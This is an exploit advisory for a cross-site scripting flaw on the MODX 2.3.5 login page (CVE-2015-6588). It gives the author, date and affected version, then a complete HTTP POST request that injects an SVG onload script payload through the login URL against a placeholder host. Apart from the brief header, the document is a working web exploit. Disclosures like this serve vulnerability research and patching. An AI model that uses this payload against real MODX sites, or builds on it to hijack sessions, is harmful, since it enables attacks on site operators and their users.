MODX 2.3.5 Cross Site Scripting
Posted on 25 November 2015
# Exploit Title: MODX Cross-Site Scripting on Login Screen # Date: 2015/11/24 # Exploit Author: Veit Hailperin # Vendor Homepage: http://modx.com # Version: MODX Version 2.3.5. Other Versions might be affected. Currently unfixed. # CVE : 2015-6588 POST /de/login-fsp.html?a"><svg/onload=alert(1)> HTTP/1.1 Host: vulnerable-installation.tld Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 74 username=admin&password=admin&returnUrl=%2Fde%2F&service=login&Login=Login